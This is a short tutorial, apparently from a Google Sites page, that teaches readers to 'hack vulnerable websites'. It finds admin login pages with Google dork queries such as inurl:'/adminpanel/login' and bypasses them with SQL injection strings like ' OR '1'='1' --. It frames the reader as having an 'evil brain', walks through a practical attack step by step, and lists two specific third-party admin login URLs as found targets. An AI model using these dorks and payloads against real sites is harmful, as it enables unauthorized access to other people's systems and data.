Embedded Files
Hacking Vulnerable Websites
Hacking Vulnerable Websites
There were a lot of misconception regarding hacking of websites, that only skilled people or geek people can hack websites but it isn’t true. Anyone can hack websites with just two things:
#1 Proper Knowledge about hacking techniques:
#1 Proper Knowledge about hacking techniques:
Which you’ll get in this article. The below article will teach you hacking technique in the most sorted and easiest way.
#2 Evil Brain
#2 Evil Brain
You reached on this page, that proves 😉
So how to hack websites?
So how to hack websites?
There are many ways to hack websites, it depends on us to choose which technique to hack. Here i’ll be using combo of two technique i.e.
# Google Dork
# Google Dork
# Sql Injection
# Sql Injection
Our first goal is to find out the vulnerable websites, for that we need google dorks. Google dork is very simple technique all you have to do is; write a dork (dorks are nothing but some Formulas to find vulnerable websites) in google search box and find out sites which are vulnerable.
What sort of dorks?
What sort of dorks?
“inurl:.”domain”/”dorks” “
So you would normally understand it like this:
“inurl” = input URL
“domain” = your desired domain ex. .gov
“dorks” = your dork of your choice
You can use following words instead of inurl :
intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:
You can use the intitle to find anything in the title of the website. Which also could be useful to find downloads or anything else.
intitle: index of mp3
This is an example to download mp3 songs for free.
Now here, in using dork we need to use our evil brain to find out that which query or formula will give result of vulnerable websites. An example of this is given in practical section below.
So once you got to know about google dork, lets go for SQL injection.
How to use SQL Injection?
How to use SQL Injection?
This is the most simplest part, Once you found a vulnerable website you just have to fill username and password in their login page like this:
Username : ‘=’ ‘OR’
Password : ‘=’ ‘OR’
or some other sql Injections like:
‘ OR ‘1’=’1′ —
‘ OR ‘1’=’1′ ({
‘ OR ‘1’=’1′ /*
And that’s it!
Practically:
Practically:
Step1: Using dork as
inurl:”/adminpanel/loginpage”
Result is something like this
Step2: Opening the first link and in that login page injecting our sql command
Username : ‘=’ ‘OR’
Password : ‘=’ ‘OR’
And here we go
Some of the sites which i found while dorking
Dork as :
inurl:”adminpanel/login”
http://www.mindsparktechnologies.com/UAT/ASL/adminpanel/login.html
http://optimaindia.in/adminpanel/login.php
Google Sites
Report abuse